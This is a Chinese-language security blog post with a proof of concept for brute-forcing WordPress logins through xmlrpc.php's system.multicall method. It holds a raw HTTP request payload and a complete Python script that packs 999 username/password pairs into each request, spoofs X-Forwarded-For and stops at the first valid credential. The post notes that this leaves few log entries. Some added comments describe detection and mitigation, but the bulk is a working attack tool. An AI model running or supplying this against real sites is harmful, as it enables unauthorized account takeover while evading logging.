利用xmlrpc.php来进行账号的暴力破解,原文:https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html
只是给出POC。
以往的文章介绍的都是一次请求只尝试一组账号密码；这里是一次请求尝试多组账号密码。一个请求里放一千组账号密码也没问题，服务器日志里也只会留下几条 xmlrpc 记录。
通过查看官方文档写成如下EXP:
POST /wp/wordpress//xmlrpc.php HTTP/1.1 Host: weisuo.org Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; [email protected]) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1196 <?xml version="1.0"?> <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data><value> <struct> <member> <name>methodName</name> <value><string>wp.getCategories</string></value> </member> <member> <name>params</name> <value> <array> <data> <value><string>1</string></value> <value><string>c4bbage</string></value> <value><string>11</string></value> </data> </array> </value> </member> </struct> </value> <value> <struct> <member> <name>methodName</name> <value><string>wp.getCategories</string></value> </member> <member> <name>params</name> <value> <array> <data> <value><string>1</string></value> <value><string>c4bbage</string></value> <value><string>123456zz</string></value> </data> </array> </value> </member> </struct> </value> </data> </array> </value> </param> </params> </methodCall>
weibo:http://weibo.com/s4turnus
#参考https://code.google.com/p/gi-torrent/wiki/system_multicall
利用脚本
# coding=utf-8
# author:[email protected]
# weibo:http://weibo.com/s4turnus
"""Proof of concept for the xmlrpc.php system.multicall amplification described above.

One POST to xmlrpc.php carries a system.multicall envelope whose entries are
wp.getCategories calls, each with its own username/password, so a single request
exercises many credential pairs while the web server logs only one line per POST.

NOTE(review), defender's view of what this exercises:
  - Detection: POSTs to xmlrpc.php whose body is a system.multicall (and unusually
    large request bodies on that path) are the observable signal; the per-credential
    attempts inside the envelope do not appear as separate web-server log lines.
  - Mitigation: disable XML-RPC (or the system.multicall method) where it is not
    needed and rate-limit xmlrpc.php at the edge.  Newer WordPress releases are
    understood to stop evaluating further credentials in a multicall after the
    first authentication failure -- confirm against the deployed version.
"""
import requests  # unused in this script
import httplib
import urlparse
import io  # unused in this script
import argparse


def post(host, pl, port=80, path='/xmlrpc.php'):
    """Send one system.multicall envelope to xmlrpc.php and return the raw response body.

    Args:
        host: value used for the Host header; anything after ':' is dropped when
            opening the TCP connection (the port comes from ``port`` instead).
        pl: pre-rendered ``<value><struct>...</struct></value>`` entries that are
            spliced in place of the ``[pl]`` marker of the envelope.
        port: TCP port to connect to.
        path: request path, ``/xmlrpc.php`` by default.

    Returns:
        The response body exactly as returned by ``HTTPResponse.read()``.
    """
    # Both the browser-looking User-Agent and the X-Forwarded-For value are
    # chosen by the client; edge rate limiting or logging must not key on an
    # X-Forwarded-For header received from an untrusted client.
    postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
    # system.multicall envelope; ``[pl]`` is replaced with the per-credential entries.
    postcontent = '''<?xml version="1.0"?> <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>[pl] </data> </array> </value> </param> </params> </methodCall> '''
    # Python 2 httplib: the third positional argument is ``strict``.  No timeout
    # is given, so a server that never answers blocks this call indefinitely.
    resultHtml = httplib.HTTPConnection(host.split(":")[0], port, False)
    resultHtml.request(
        'POST', path, body=postcontent.replace('[pl]', pl), headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect


def main():
    """Command-line entry point: read user/password lists and post them in chunks of ``t``."""
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. /nby c4bbage http://weibo.com/s4turnus')
    parser.add_argument('-t', action="store", dest="url", required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php')
    parser.add_argument('-u', action="store", dest="userfile", required=True,
                        help='exp: -u username.txt', type=argparse.FileType('r'))
    parser.add_argument('-p', action="store", dest="pwdfile", required=True,
                        help='exp: -p password.txt', type=argparse.FileType('r'))
    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    # Port is taken from the netloc when present.  str.index raises ValueError
    # when ':' is absent, so the else branch is only reached for a netloc that
    # starts with ':' (index 0); the port stays a string when it is found.
    if(url.netloc.index(':') > 0):
        urlport = url.netloc.split(":")[1]
    else:
        urlport = 80
    # 999 username/password pairs per request
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    # One multicall entry: wp.getCategories with params ("1", username, password);
    # the two markers are substituted per credential pair below.
    pl = ''' <value><struct><member> <name>methodName</name> <value><string>wp.getCategories</string></value> </member> <member> <name>params</name> <value><array><data> <value><string>1</string></value> <value><string>[username]</string></value> <value><string>[pwd]</string></value> </data></array></value> </member></struct></value>'''
    # Full cartesian product of users x passwords, whitespace-stripped.
    up = [[u.strip(), p.strip()] for u in users for p in pwds]
    i = 0
    apl = ''
    # Walk the pair list in chunks of t.  With '<=' and Python 2 integer division
    # the final chunk, which may be empty, is posted as well.
    while i <= len(up) / t:
        apl = ''
        s = i * t
        for a in up[s:s + t]:
            apl += pl.replace('[username]', a[0]).replace('[pwd]', a[1])
            pass
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        # extract the result: the script treats a response containing
        # "categoryDescription" as a successful call; the body is split per
        # result struct and rr maps the matching struct back to its pair.
        if(res.find("categoryDescription") > 0):
            rr = 0
            for r in res.split("</struct></value>"):
                if(r.find("categoryDescription") > 0):
                    print up[s:s + t][rr]  # Python 2 print statement
                    # exit after the first hit
                    exit()
                    pass
                rr += 1
        i += 1
        pass


if __name__ == '__main__':
    main()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。